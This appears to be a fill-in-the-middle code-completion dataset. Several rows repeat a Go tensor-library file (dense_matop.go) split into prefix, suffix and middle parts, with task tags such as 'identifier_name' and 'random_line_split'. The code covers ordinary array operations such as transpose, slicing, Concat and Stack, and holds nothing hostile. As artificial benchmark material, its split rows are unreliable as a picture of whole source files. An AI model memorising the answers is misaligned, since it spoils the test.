newShape[cur] = s
cur++
}
newStrides := newShape.calcStrides()
ap := NewAP(newShape, newStrides)
allNoMat := !t.IsMaterializable()
for _, ot := range others {
if allNoMat && ot.IsMaterializable() {
allNoMat = false
}
}
retVal = recycledDense(t.t, ap.Shape())
ReturnAP(retVal.AP)
retVal.AP = ap
// the "viewStack" method is the more generalized method
// and will work for all Tensors, regardless of whether it's a view
// But the simpleStack is faster, and is an optimization
if allNoMat {
retVal = t.simpleStack(retVal, axis, others...)
} else {
retVal = t.viewStack(retVal, axis, others...)
}
return
}
/* Private Methods */
// returns the new index given the old index
func (t *Dense) transposeIndex(i int, transposePat, strides []int) int {
oldCoord, err := Itol(i, t.oshape(), t.ostrides())
if err != nil {
panic(err)
}
/*
coordss, _ := Permute(transposePat, oldCoord)
coords := coordss[0]
expShape := t.Shape()
index, _ := Ltoi(expShape, strides, coords...)
*/
// The above is the "conceptual" algorithm.
// Too many checks above slows things down, so the below is the "optimized" edition
var index int
for i, axis := range transposePat {
index += oldCoord[axis] * strides[i]
}
return index
}
// at returns the index at which the coordinate is referring to.
// This function encapsulates the addressing of elements in a contiguous block.
// For a 2D ndarray, ndarray.at(i,j) is
// at = ndarray.strides[0]*i + ndarray.strides[1]*j
// This is of course, extensible to any number of dimensions.
func (t *Dense) at(coords ...int) (at int, err error) {
return Ltoi(t.Shape(), t.Strides(), coords...)
}
// maskat returns the mask index at which the coordinate is referring to.
func (t *Dense) maskAt(coords ...int) (at int, err error) {
//TODO: Add check for non-masked tensor
return t.at(coords...)
}
// simpleStack is the data movement function for non-view tensors. What it does is simply copy the data according to the new strides
func (t *Dense) simpleStack(retVal *Dense, axis int, others ...*Dense) *Dense {
switch axis {
case 0:
copyDense(retVal, t)
next := t.len()
for _, ot := range others {
copySliced(retVal, next, retVal.len(), ot, 0, ot.len())
next += ot.len()
}
default:
axisStride := retVal.AP.Strides()[axis]
batches := retVal.len() / axisStride
destStart := 0
start := 0
end := start + axisStride
for i := 0; i < batches; i++ {
copySliced(retVal, destStart, retVal.len(), t, start, end)
for _, ot := range others {
destStart += axisStride
copySliced(retVal, destStart, retVal.len(), ot, start, end)
i++
}
destStart += axisStride
start += axisStride
end += axisStride
}
}
return retVal
}
// viewStack is the data movement function for Stack(), applied on views
func (t *Dense) viewStack(retVal *Dense, axis int, others ...*Dense) *Dense {
axisStride := retVal.AP.Strides()[axis]
batches := retVal.len() / axisStride
it := NewFlatIterator(t.AP)
ch := it.Chan()
chs := make([]chan int, len(others))
chs = chs[:0]
for _, ot := range others {
oter := NewFlatIterator(ot.AP)
chs = append(chs, oter.Chan())
}
t.doViewStack(retVal, axisStride, batches, ch, others, chs)
return retVal
}
| Concat | identifier_name |
dense_matop.go | package tensor
import (
"github.com/pkg/errors"
"reflect"
)
// Apply applies a function to all the values in the ndarray
func (t *Dense) Apply(fn interface{}, opts ...FuncOpt) (retVal Tensor, err error) {
fo := parseFuncOpts(opts...)
reuseT, incr := fo.incrReuse()
safe := fo.safe()
var reuse *Dense
if reuse, err = getDense(reuseT); err != nil {
return
}
// check reuse and stuff
var res *Dense
switch {
case reuse != nil:
res = reuse
if res.len() != t.Size() {
err = errors.Errorf(shapeMismatch, t.Shape(), reuse.Shape())
return
}
case !safe:
res = t
default:
if t.IsMaterializable() {
res = t.Materialize().(*Dense)
} else {
res = t.Clone().(*Dense)
}
}
// do
switch {
case t.viewOf == nil:
err = res.mapFn(fn, incr)
case t.viewOf != nil:
it := IteratorFromDense(t)
if err = res.iterMap(fn, it, incr); err != nil {
return
}
default:
err = errors.Errorf("Apply not implemented for this state: isView: %t and incr: %t", t.viewOf == nil, incr)
return
}
// set retVal
switch {
case reuse != nil:
if err = reuseCheckShape(reuse, t.Shape()); err != nil {
return
}
retVal = reuse
case !safe:
retVal = t
default:
retVal = res
// retVal = New(Of(t.t), WithBacking(res), WithShape(t.Shape()...))
}
return
}
// T performs a thunked transpose. It doesn't actually do anything, except store extra information about the post-transposed shapes and strides
// Usually this is more than enough, as BLAS will handle the rest of the transpose
func (t *Dense) T(axes ...int) (err error) {
var transform *AP
if transform, axes, err = t.AP.T(axes...); err != nil {
return handleNoOp(err)
}
// is there any old transposes that need to be done first?
// this is important, because any old transposes for dim >=3 are merely permutations of the strides
if t.old != nil {
if t.IsVector() {
// the transform that was calculated was a waste of time - return it to the pool then untranspose
ReturnAP(transform)
t.UT()
return
}
// check if the current axes are just a reverse of the previous transpose's
isReversed := true
for i, s := range t.oshape() {
if transform.Shape()[i] != s {
isReversed = false
break
}
}
// if it is reversed, well, we just restore the backed up one
if isReversed {
ReturnAP(transform)
t.UT()
return
}
// cool beans. No funny reversals. We'd have to actually do transpose then
t.Transpose()
}
// swap out the old and the new
t.old = t.AP
t.transposeWith = axes
t.AP = transform
return nil
}
// UT is a quick way to untranspose a currently transposed *Dense
// The reason for having this is quite simply illustrated by this problem:
// T = NewTensor(WithShape(2,3,4))
// T.T(1,2,0)
//
// To untranspose that, we'd need to apply a transpose of (2,0,1).
// This means having to keep track and calculate the transposes.
// Instead, here's a helpful convenience function to instantly untranspose any previous transposes.
//
// Nothing will happen if there was no previous transpose
func (t *Dense) UT() {
if t.old != nil {
ReturnAP(t.AP)
ReturnInts(t.transposeWith)
t.AP = t.old
t.old = nil
t.transposeWith = nil
}
}
// SafeT is exactly like T(), except it returns a new *Dense. The data is also copied over, unmoved.
func (t *Dense) SafeT(axes ...int) (retVal *Dense, err error) {
var transform *AP
if transform, axes, err = t.AP.T(axes...); err != nil {
if err = handleNoOp(err); err != nil {
return
}
}
retVal = recycledDense(t.t, Shape{t.len()})
copyDense(retVal, t)
retVal.AP = transform
retVal.old = t.AP.Clone()
retVal.transposeWith = axes
return
}
// Transpose() actually transposes the data.
// This is a generalized version of the inplace matrix transposition algorithm from Wikipedia:
// https://en.wikipedia.org/wiki/In-place_matrix_transposition
func (t *Dense) Transpose() {
// if there is no oldinfo, that means the current info is the latest, and not the transpose
if t.old == nil {
return
}
if t.IsScalar() {
return // cannot transpose scalars
}
defer func() {
ReturnAP(t.old)
t.old = nil
t.transposeWith = nil
}()
expShape := t.Shape()
expStrides := expShape.calcStrides() // important! because the strides would have changed once the underlying data changed
defer ReturnInts(expStrides)
defer func() {
t.setShape(expShape...)
t.sanity()
}()
if t.IsVector() {
// no change of strides.
return
}
t.transpose(expStrides)
}
// At returns the value at the given coordinate
func (t *Dense) At(coords ...int) (interface{}, error) {
if len(coords) != t.Dims() {
return nil, errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.at(coords...)
if err != nil {
return nil, errors.Wrap(err, "At()")
}
return t.Get(at), nil
}
// MaskAt returns the value of the mask at a given coordinate
// returns false (valid) if not tensor is not masked
func (t *Dense) MaskAt(coords ...int) (bool, error) {
if !t.IsMasked() {
return false, nil
}
if len(coords) != t.Dims() {
return true, errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.maskAt(coords...)
if err != nil {
return true, errors.Wrap(err, "MaskAt()")
}
return t.mask[at], nil
}
// SetAt sets the value at the given coordinate
func (t *Dense) SetAt(v interface{}, coords ...int) error {
if len(coords) != t.Dims() {
return errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.at(coords...)
if err != nil {
return errors.Wrap(err, "SetAt()")
}
t.Set(at, v)
return nil
}
// SetMaskAtDataIndex set the value of the mask at a given index
func (t *Dense) SetMaskAtIndex(v bool, i int) error {
if !t.IsMasked() {
return nil
}
t.mask[i] = v
return nil
}
// SetMaskAt sets the mask value at the given coordinate
func (t *Dense) SetMaskAt(v bool, coords ...int) error {
if !t.IsMasked() {
return nil
}
if len(coords) != t.Dims() {
return errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.maskAt(coords...)
if err != nil {
return errors.Wrap(err, "SetAt()")
}
t.mask[at] = v
return nil
}
// Repeat is like Numpy's repeat. It repeats the elements of an array.
// The repeats param defines how many times each element in the axis is repeated.
// Just like NumPy, the repeats param is broadcasted to fit the size of the given axis.
func (t *Dense) Repeat(axis int, repeats ...int) (retVal Tensor, err error) {
var newShape Shape
var size int
if newShape, repeats, size, err = t.Shape().Repeat(axis, repeats...); err != nil {
return nil, errors.Wrap(err, "Unable to get repeated shape")
}
if axis == AllAxes {
axis = 0
}
d := recycledDense(t.t, newShape)
// d := New(Of(t.t), WithShape(newShape...))
var outers int
if t.IsScalar() {
outers = 1
} else {
outers = ProdInts(t.Shape()[0:axis])
if outers == 0 {
outers = 1
}
}
var stride, newStride int
if newShape.IsVector() || t.IsVector() {
stride = 1 // special case because CalcStrides() will return []int{1} as the strides for a vector
} else {
stride = t.ostrides()[axis]
}
if newShape.IsVector() {
newStride = 1
} else {
newStride = d.ostrides()[axis]
}
var destStart, srcStart int
for i := 0; i < outers; i++ {
for j := 0; j < size; j++ {
var tmp int
tmp = repeats[j]
for k := 0; k < tmp; k++ {
if srcStart >= t.len() || destStart+stride > d.len() {
break
}
copySliced(d, destStart, d.len(), t, srcStart, t.len())
destStart += newStride
}
srcStart += stride
}
}
return d, nil
}
// CopyTo copies the underlying data to the destination *Dense. The original data is untouched.
// Note: CopyTo doesn't care about the metadata of the destination *Dense. Take for example:
// T = NewTensor(WithShape(6))
// T2 = NewTensor(WithShape(2,3))
// err = T.CopyTo(T2) // err == nil
//
// The only time that this will fail is if the underlying sizes are different
func (t *Dense) CopyTo(other *Dense) error {
if other == t {
return nil // nothing to copy to. Maybe return NoOpErr?
}
if other.Size() != t.Size() {
return errors.Errorf(sizeMismatch, t.Size(), other.Size())
}
// easy peasy lemon squeezy
if t.viewOf == nil && other.viewOf == nil {
copyDense(other, t)
return nil
}
return errors.Errorf(methodNYI, "CopyTo", "views")
}
// Slice performs slicing on the *Dense Tensor. It returns a view which shares the same underlying memory as the original *Dense.
//
// Given:
// T = NewTensor(WithShape(2,2), WithBacking(RangeFloat64(0,4)))
// V, _ := T.Slice(nil, singleSlice(1)) // T[:, 1]
//
// Any modification to the values in V, will be reflected in T as well.
//
// The method treats <nil> as equivalent to a colon slice. T.Slice(nil) is equivalent to T[:] in Numpy syntax
func (t *Dense) Slice(slices ...Slice) (retVal Tensor, err error) {
var newAP *AP
var ndStart, ndEnd int
if newAP, ndStart, ndEnd, err = t.AP.S(t.len(), slices...); err != nil {
return
}
view := new(Dense)
view.t = t.t
view.viewOf = t
view.AP = newAP
view.hdr = new(reflect.SliceHeader)
view.data = t.data
view.hdr.Data = t.hdr.Data
view.hdr.Len = t.hdr.Len
view.hdr.Cap = t.hdr.Cap
view.slice(ndStart, ndEnd)
if t.IsMasked() {
view.mask = t.mask[ndStart:ndEnd]
}
return view, err
}
// RollAxis rolls the axis backwards until it lies in the given position.
//
// This method was adapted from Numpy's Rollaxis. The licence for Numpy is a BSD-like licence and can be found here: https://github.com/numpy/numpy/blob/master/LICENSE.txt
//
// As a result of being adapted from Numpy, the quirks are also adapted. A good guide reducing the confusion around rollaxis can be found here: http://stackoverflow.com/questions/29891583/reason-why-numpy-rollaxis-is-so-confusing (see answer by hpaulj)
func (t *Dense) RollAxis(axis, start int, safe bool) (retVal *Dense, err error) {
dims := t.Dims()
if !(axis >= 0 && axis < dims) {
err = errors.Errorf(invalidAxis, axis, dims)
return
}
if !(start >= 0 && start <= dims) {
err = errors.Wrap(errors.Errorf(invalidAxis, axis, dims), "Start axis is wrong")
return
}
if axis < start {
start--
}
if axis == start {
retVal = t
return
}
axes := BorrowInts(dims)
defer ReturnInts(axes)
for i := 0; i < dims; i++ {
axes[i] = i
}
copy(axes[axis:], axes[axis+1:])
copy(axes[start+1:], axes[start:])
axes[start] = axis
if safe {
return t.SafeT(axes...)
}
err = t.T(axes...)
retVal = t
return
}
// Concat concatenates the other tensors along the given axis. It is like Numpy's concatenate() function.
func (t *Dense) Concat(axis int, Ts ...*Dense) (retVal *Dense, err error) {
ss := make([]Shape, len(Ts))
var isMasked = false
for i, T := range Ts {
ss[i] = T.Shape()
isMasked = isMasked || T.IsMasked()
}
var newShape Shape
if newShape, err = t.Shape().Concat(axis, ss...); err != nil {
return
}
retVal = recycledDense(t.t, newShape)
if isMasked {
retVal.makeMask()
}
all := make([]*Dense, len(Ts)+1)
all[0] = t
copy(all[1:], Ts)
// special case
var start, end int
for _, T := range all {
end += T.Shape()[axis]
slices := make([]Slice, axis+1)
slices[axis] = makeRS(start, end)
var v *Dense
if v, err = sliceDense(retVal, slices...); err != nil {
return
}
if v.IsVector() && T.IsMatrix() && axis == 0 {
v.reshape(v.shape[0], 1)
}
if err = assignArray(v, T); err != nil {
return
}
start = end
}
return
}
// Hstack stacks other tensors columnwise (horizontal stacking)
func (t *Dense) Hstack(others ...*Dense) (*Dense, error) {
// check that everything is at least 1D
if t.Dims() == 0 {
return nil, errors.Errorf(atleastDims, 1)
}
for _, d := range others {
if d.Dims() < 1 {
return nil, errors.Errorf(atleastDims, 1)
}
}
if t.Dims() == 1 {
return t.Concat(0, others...)
}
return t.Concat(1, others...)
}
// Vstack stacks other tensors rowwise (vertical stacking). Vertical stacking requires all involved Tensors to have at least 2 dimensions
func (t *Dense) Vstack(others ...*Dense) (*Dense, error) {
// check that everything is at least 2D
if t.Dims() < 2 {
return nil, errors.Errorf(atleastDims, 2)
}
for _, d := range others {
if d.Dims() < 2 {
return nil, errors.Errorf(atleastDims, 2)
}
} |
// Stack stacks the other tensors along the axis specified. It is like Numpy's stack function.
func (t *Dense) Stack(axis int, others ...*Dense) (retVal *Dense, err error) {
opdims := t.Dims()
if axis >= opdims+1 {
err = errors.Errorf(dimMismatch, opdims+1, axis)
return
}
newShape := Shape(BorrowInts(opdims + 1))
newShape[axis] = len(others) + 1
shape := t.Shape()
var cur int
for i, s := range shape {
if i == axis {
cur++
}
newShape[cur] = s
cur++
}
newStrides := newShape.calcStrides()
ap := NewAP(newShape, newStrides)
allNoMat := !t.IsMaterializable()
for _, ot := range others {
if allNoMat && ot.IsMaterializable() {
allNoMat = false
}
}
retVal = recycledDense(t.t, ap.Shape())
ReturnAP(retVal.AP)
retVal.AP = ap
// the "viewStack" method is the more generalized method
// and will work for all Tensors, regardless of whether it's a view
// But the simpleStack is faster, and is an optimization
if allNoMat {
retVal = t.simpleStack(retVal, axis, others...)
} else {
retVal = t.viewStack(retVal, axis, others...)
}
return
}
/* Private Methods */
// returns the new index given the old index
func (t *Dense) transposeIndex(i int, transposePat, strides []int) int {
oldCoord, err := Itol(i, t.oshape(), t.ostrides())
if err != nil {
panic(err)
}
/*
coordss, _ := Permute(transposePat, oldCoord)
coords := coordss[0]
expShape := t.Shape()
index, _ := Ltoi(expShape, strides, coords...)
*/
// The above is the "conceptual" algorithm.
// Too many checks above slows things down, so the below is the "optimized" edition
var index int
for i, axis := range transposePat {
index += oldCoord[axis] * strides[i]
}
return index
}
// at returns the index at which the coordinate is referring to.
// This function encapsulates the addressing of elements in a contiguous block.
// For a 2D ndarray, ndarray.at(i,j) is
// at = ndarray.strides[0]*i + ndarray.strides[1]*j
// This is of course, extensible to any number of dimensions.
func (t *Dense) at(coords ...int) (at int, err error) {
return Ltoi(t.Shape(), t.Strides(), coords...)
}
// maskat returns the mask index at which the coordinate is referring to.
func (t *Dense) maskAt(coords ...int) (at int, err error) {
//TODO: Add check for non-masked tensor
return t.at(coords...)
}
// simpleStack is the data movement function for non-view tensors. What it does is simply copy the data according to the new strides
func (t *Dense) simpleStack(retVal *Dense, axis int, others ...*Dense) *Dense {
switch axis {
case 0:
copyDense(retVal, t)
next := t.len()
for _, ot := range others {
copySliced(retVal, next, retVal.len(), ot, 0, ot.len())
next += ot.len()
}
default:
axisStride := retVal.AP.Strides()[axis]
batches := retVal.len() / axisStride
destStart := 0
start := 0
end := start + axisStride
for i := 0; i < batches; i++ {
copySliced(retVal, destStart, retVal.len(), t, start, end)
for _, ot := range others {
destStart += axisStride
copySliced(retVal, destStart, retVal.len(), ot, start, end)
i++
}
destStart += axisStride
start += axisStride
end += axisStride
}
}
return retVal
}
// viewStack is the data movement function for Stack(), applied on views
func (t *Dense) viewStack(retVal *Dense, axis int, others ...*Dense) *Dense {
axisStride := retVal.AP.Strides()[axis]
batches := retVal.len() / axisStride
it := NewFlatIterator(t.AP)
ch := it.Chan()
chs := make([]chan int, len(others))
chs = chs[:0]
for _, ot := range others {
oter := NewFlatIterator(ot.AP)
chs = append(chs, oter.Chan())
}
t.doViewStack(retVal, axisStride, batches, ch, others, chs)
return retVal
} | return t.Concat(0, others...)
} | random_line_split |
dense_matop.go | package tensor
import (
"github.com/pkg/errors"
"reflect"
)
// Apply applies a function to all the values in the ndarray
func (t *Dense) Apply(fn interface{}, opts ...FuncOpt) (retVal Tensor, err error) {
fo := parseFuncOpts(opts...)
reuseT, incr := fo.incrReuse()
safe := fo.safe()
var reuse *Dense
if reuse, err = getDense(reuseT); err != nil {
return
}
// check reuse and stuff
var res *Dense
switch {
case reuse != nil:
res = reuse
if res.len() != t.Size() {
err = errors.Errorf(shapeMismatch, t.Shape(), reuse.Shape())
return
}
case !safe:
res = t
default:
if t.IsMaterializable() {
res = t.Materialize().(*Dense)
} else {
res = t.Clone().(*Dense)
}
}
// do
switch {
case t.viewOf == nil:
err = res.mapFn(fn, incr)
case t.viewOf != nil:
it := IteratorFromDense(t)
if err = res.iterMap(fn, it, incr); err != nil {
return
}
default:
err = errors.Errorf("Apply not implemented for this state: isView: %t and incr: %t", t.viewOf == nil, incr)
return
}
// set retVal
switch {
case reuse != nil:
if err = reuseCheckShape(reuse, t.Shape()); err != nil {
return
}
retVal = reuse
case !safe:
retVal = t
default:
retVal = res
// retVal = New(Of(t.t), WithBacking(res), WithShape(t.Shape()...))
}
return
}
// T performs a thunked transpose. It doesn't actually do anything, except store extra information about the post-transposed shapes and strides
// Usually this is more than enough, as BLAS will handle the rest of the transpose
func (t *Dense) T(axes ...int) (err error) {
var transform *AP
if transform, axes, err = t.AP.T(axes...); err != nil {
return handleNoOp(err)
}
// is there any old transposes that need to be done first?
// this is important, because any old transposes for dim >=3 are merely permutations of the strides
if t.old != nil {
if t.IsVector() {
// the transform that was calculated was a waste of time - return it to the pool then untranspose
ReturnAP(transform)
t.UT()
return
}
// check if the current axes are just a reverse of the previous transpose's
isReversed := true
for i, s := range t.oshape() {
if transform.Shape()[i] != s {
isReversed = false
break
}
}
// if it is reversed, well, we just restore the backed up one
if isReversed {
ReturnAP(transform)
t.UT()
return
}
// cool beans. No funny reversals. We'd have to actually do transpose then
t.Transpose()
}
// swap out the old and the new
t.old = t.AP
t.transposeWith = axes
t.AP = transform
return nil
}
// UT is a quick way to untranspose a currently transposed *Dense
// The reason for having this is quite simply illustrated by this problem:
// T = NewTensor(WithShape(2,3,4))
// T.T(1,2,0)
//
// To untranspose that, we'd need to apply a transpose of (2,0,1).
// This means having to keep track and calculate the transposes.
// Instead, here's a helpful convenience function to instantly untranspose any previous transposes.
//
// Nothing will happen if there was no previous transpose
func (t *Dense) UT() {
if t.old != nil {
ReturnAP(t.AP)
ReturnInts(t.transposeWith)
t.AP = t.old
t.old = nil
t.transposeWith = nil
}
}
// SafeT is exactly like T(), except it returns a new *Dense. The data is also copied over, unmoved.
func (t *Dense) SafeT(axes ...int) (retVal *Dense, err error) {
var transform *AP
if transform, axes, err = t.AP.T(axes...); err != nil {
if err = handleNoOp(err); err != nil {
return
}
}
retVal = recycledDense(t.t, Shape{t.len()})
copyDense(retVal, t)
retVal.AP = transform
retVal.old = t.AP.Clone()
retVal.transposeWith = axes
return
}
// Transpose() actually transposes the data.
// This is a generalized version of the inplace matrix transposition algorithm from Wikipedia:
// https://en.wikipedia.org/wiki/In-place_matrix_transposition
func (t *Dense) Transpose() {
// if there is no oldinfo, that means the current info is the latest, and not the transpose
if t.old == nil {
return
}
if t.IsScalar() {
return // cannot transpose scalars
}
defer func() {
ReturnAP(t.old)
t.old = nil
t.transposeWith = nil
}()
expShape := t.Shape()
expStrides := expShape.calcStrides() // important! because the strides would have changed once the underlying data changed
defer ReturnInts(expStrides)
defer func() {
t.setShape(expShape...)
t.sanity()
}()
if t.IsVector() {
// no change of strides.
return
}
t.transpose(expStrides)
}
// At returns the value at the given coordinate
func (t *Dense) At(coords ...int) (interface{}, error) {
if len(coords) != t.Dims() {
return nil, errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.at(coords...)
if err != nil {
return nil, errors.Wrap(err, "At()")
}
return t.Get(at), nil
}
// MaskAt returns the value of the mask at a given coordinate
// returns false (valid) if not tensor is not masked
func (t *Dense) MaskAt(coords ...int) (bool, error) {
if !t.IsMasked() {
return false, nil
}
if len(coords) != t.Dims() {
return true, errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.maskAt(coords...)
if err != nil {
return true, errors.Wrap(err, "MaskAt()")
}
return t.mask[at], nil
}
// SetAt sets the value at the given coordinate
func (t *Dense) SetAt(v interface{}, coords ...int) error {
if len(coords) != t.Dims() {
return errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.at(coords...)
if err != nil {
return errors.Wrap(err, "SetAt()")
}
t.Set(at, v)
return nil
}
// SetMaskAtDataIndex set the value of the mask at a given index
func (t *Dense) SetMaskAtIndex(v bool, i int) error {
if !t.IsMasked() {
return nil
}
t.mask[i] = v
return nil
}
// SetMaskAt sets the mask value at the given coordinate
func (t *Dense) SetMaskAt(v bool, coords ...int) error {
if !t.IsMasked() {
return nil
}
if len(coords) != t.Dims() {
return errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.maskAt(coords...)
if err != nil {
return errors.Wrap(err, "SetAt()")
}
t.mask[at] = v
return nil
}
// Repeat is like Numpy's repeat. It repeats the elements of an array.
// The repeats param defines how many times each element in the axis is repeated.
// Just like NumPy, the repeats param is broadcasted to fit the size of the given axis.
func (t *Dense) Repeat(axis int, repeats ...int) (retVal Tensor, err error) {
var newShape Shape
var size int
if newShape, repeats, size, err = t.Shape().Repeat(axis, repeats...); err != nil {
return nil, errors.Wrap(err, "Unable to get repeated shape")
}
if axis == AllAxes {
axis = 0
}
d := recycledDense(t.t, newShape)
// d := New(Of(t.t), WithShape(newShape...))
var outers int
if t.IsScalar() {
outers = 1
} else {
outers = ProdInts(t.Shape()[0:axis])
if outers == 0 {
outers = 1
}
}
var stride, newStride int
if newShape.IsVector() || t.IsVector() {
stride = 1 // special case because CalcStrides() will return []int{1} as the strides for a vector
} else {
stride = t.ostrides()[axis]
}
if newShape.IsVector() {
newStride = 1
} else {
newStride = d.ostrides()[axis]
}
var destStart, srcStart int
for i := 0; i < outers; i++ {
for j := 0; j < size; j++ {
var tmp int
tmp = repeats[j]
for k := 0; k < tmp; k++ {
if srcStart >= t.len() || destStart+stride > d.len() {
break
}
copySliced(d, destStart, d.len(), t, srcStart, t.len())
destStart += newStride
}
srcStart += stride
}
}
return d, nil
}
// CopyTo copies the underlying data to the destination *Dense. The original data is untouched.
// Note: CopyTo doesn't care about the metadata of the destination *Dense. Take for example:
// T = NewTensor(WithShape(6))
// T2 = NewTensor(WithShape(2,3))
// err = T.CopyTo(T2) // err == nil
//
// The only time that this will fail is if the underlying sizes are different
func (t *Dense) CopyTo(other *Dense) error {
if other == t {
return nil // nothing to copy to. Maybe return NoOpErr?
}
if other.Size() != t.Size() {
return errors.Errorf(sizeMismatch, t.Size(), other.Size())
}
// easy peasy lemon squeezy
if t.viewOf == nil && other.viewOf == nil {
copyDense(other, t)
return nil
}
return errors.Errorf(methodNYI, "CopyTo", "views")
}
// Slice performs slicing on the *Dense Tensor. It returns a view which shares the same underlying memory as the original *Dense.
//
// Given:
// T = NewTensor(WithShape(2,2), WithBacking(RangeFloat64(0,4)))
// V, _ := T.Slice(nil, singleSlice(1)) // T[:, 1]
//
// Any modification to the values in V, will be reflected in T as well.
//
// The method treats <nil> as equivalent to a colon slice. T.Slice(nil) is equivalent to T[:] in Numpy syntax
func (t *Dense) Slice(slices ...Slice) (retVal Tensor, err error) {
var newAP *AP
var ndStart, ndEnd int
if newAP, ndStart, ndEnd, err = t.AP.S(t.len(), slices...); err != nil {
return
}
view := new(Dense)
view.t = t.t
view.viewOf = t
view.AP = newAP
view.hdr = new(reflect.SliceHeader)
view.data = t.data
view.hdr.Data = t.hdr.Data
view.hdr.Len = t.hdr.Len
view.hdr.Cap = t.hdr.Cap
view.slice(ndStart, ndEnd)
if t.IsMasked() {
view.mask = t.mask[ndStart:ndEnd]
}
return view, err
}
// RollAxis rolls the axis backwards until it lies in the given position.
//
// This method was adapted from Numpy's Rollaxis. The licence for Numpy is a BSD-like licence and can be found here: https://github.com/numpy/numpy/blob/master/LICENSE.txt
//
// As a result of being adapted from Numpy, the quirks are also adapted. A good guide reducing the confusion around rollaxis can be found here: http://stackoverflow.com/questions/29891583/reason-why-numpy-rollaxis-is-so-confusing (see answer by hpaulj)
func (t *Dense) RollAxis(axis, start int, safe bool) (retVal *Dense, err error) {
dims := t.Dims()
if !(axis >= 0 && axis < dims) {
err = errors.Errorf(invalidAxis, axis, dims)
return
}
if !(start >= 0 && start <= dims) {
err = errors.Wrap(errors.Errorf(invalidAxis, axis, dims), "Start axis is wrong")
return
}
if axis < start {
start--
}
if axis == start {
retVal = t
return
}
axes := BorrowInts(dims)
defer ReturnInts(axes)
for i := 0; i < dims; i++ {
axes[i] = i
}
copy(axes[axis:], axes[axis+1:])
copy(axes[start+1:], axes[start:])
axes[start] = axis
if safe {
return t.SafeT(axes...)
}
err = t.T(axes...)
retVal = t
return
}
// Concat concatenates the other tensors along the given axis. It is like Numpy's concatenate() function.
func (t *Dense) Concat(axis int, Ts ...*Dense) (retVal *Dense, err error) {
ss := make([]Shape, len(Ts))
var isMasked = false
for i, T := range Ts {
ss[i] = T.Shape()
isMasked = isMasked || T.IsMasked()
}
var newShape Shape
if newShape, err = t.Shape().Concat(axis, ss...); err != nil {
return
}
retVal = recycledDense(t.t, newShape)
if isMasked {
retVal.makeMask()
}
all := make([]*Dense, len(Ts)+1)
all[0] = t
copy(all[1:], Ts)
// special case
var start, end int
for _, T := range all {
end += T.Shape()[axis]
slices := make([]Slice, axis+1)
slices[axis] = makeRS(start, end)
var v *Dense
if v, err = sliceDense(retVal, slices...); err != nil {
return
}
if v.IsVector() && T.IsMatrix() && axis == 0 {
v.reshape(v.shape[0], 1)
}
if err = assignArray(v, T); err != nil {
return
}
start = end
}
return
}
// Hstack stacks other tensors columnwise (horizontal stacking)
func (t *Dense) Hstack(others ...*Dense) (*Dense, error) {
// check that everything is at least 1D
if t.Dims() == 0 {
return nil, errors.Errorf(atleastDims, 1)
}
for _, d := range others {
if d.Dims() < 1 {
return nil, errors.Errorf(atleastDims, 1)
}
}
if t.Dims() == 1 {
return t.Concat(0, others...)
}
return t.Concat(1, others...)
}
// Vstack stacks other tensors rowwise (vertical stacking). Vertical stacking requires all involved Tensors to have at least 2 dimensions
func (t *Dense) Vstack(others ...*Dense) (*Dense, error) |
// Stack stacks the other tensors along the axis specified. It is like Numpy's stack function.
func (t *Dense) Stack(axis int, others ...*Dense) (retVal *Dense, err error) {
opdims := t.Dims()
if axis >= opdims+1 {
err = errors.Errorf(dimMismatch, opdims+1, axis)
return
}
newShape := Shape(BorrowInts(opdims + 1))
newShape[axis] = len(others) + 1
shape := t.Shape()
var cur int
for i, s := range shape {
if i == axis {
cur++
}
newShape[cur] = s
cur++
}
newStrides := newShape.calcStrides()
ap := NewAP(newShape, newStrides)
allNoMat := !t.IsMaterializable()
for _, ot := range others {
if allNoMat && ot.IsMaterializable() {
allNoMat = false
}
}
retVal = recycledDense(t.t, ap.Shape())
ReturnAP(retVal.AP)
retVal.AP = ap
// the "viewStack" method is the more generalized method
// and will work for all Tensors, regardless of whether it's a view
// But the simpleStack is faster, and is an optimization
if allNoMat {
retVal = t.simpleStack(retVal, axis, others...)
} else {
retVal = t.viewStack(retVal, axis, others...)
}
return
}
/* Private Methods */
// returns the new index given the old index
func (t *Dense) transposeIndex(i int, transposePat, strides []int) int {
oldCoord, err := Itol(i, t.oshape(), t.ostrides())
if err != nil {
panic(err)
}
/*
coordss, _ := Permute(transposePat, oldCoord)
coords := coordss[0]
expShape := t.Shape()
index, _ := Ltoi(expShape, strides, coords...)
*/
// The above is the "conceptual" algorithm.
// Too many checks above slows things down, so the below is the "optimized" edition
var index int
for i, axis := range transposePat {
index += oldCoord[axis] * strides[i]
}
return index
}
// at returns the index at which the coordinate is referring to.
// This function encapsulates the addressing of elements in a contiguous block.
// For a 2D ndarray, ndarray.at(i,j) is
// at = ndarray.strides[0]*i + ndarray.strides[1]*j
// This is of course, extensible to any number of dimensions.
func (t *Dense) at(coords ...int) (at int, err error) {
return Ltoi(t.Shape(), t.Strides(), coords...)
}
// maskat returns the mask index at which the coordinate is referring to.
func (t *Dense) maskAt(coords ...int) (at int, err error) {
//TODO: Add check for non-masked tensor
return t.at(coords...)
}
// simpleStack is the data movement function for non-view tensors. What it does is simply copy the data according to the new strides
func (t *Dense) simpleStack(retVal *Dense, axis int, others ...*Dense) *Dense {
switch axis {
case 0:
copyDense(retVal, t)
next := t.len()
for _, ot := range others {
copySliced(retVal, next, retVal.len(), ot, 0, ot.len())
next += ot.len()
}
default:
axisStride := retVal.AP.Strides()[axis]
batches := retVal.len() / axisStride
destStart := 0
start := 0
end := start + axisStride
for i := 0; i < batches; i++ {
copySliced(retVal, destStart, retVal.len(), t, start, end)
for _, ot := range others {
destStart += axisStride
copySliced(retVal, destStart, retVal.len(), ot, start, end)
i++
}
destStart += axisStride
start += axisStride
end += axisStride
}
}
return retVal
}
// viewStack is the data movement function for Stack(), applied on views
func (t *Dense) viewStack(retVal *Dense, axis int, others ...*Dense) *Dense {
axisStride := retVal.AP.Strides()[axis]
batches := retVal.len() / axisStride
it := NewFlatIterator(t.AP)
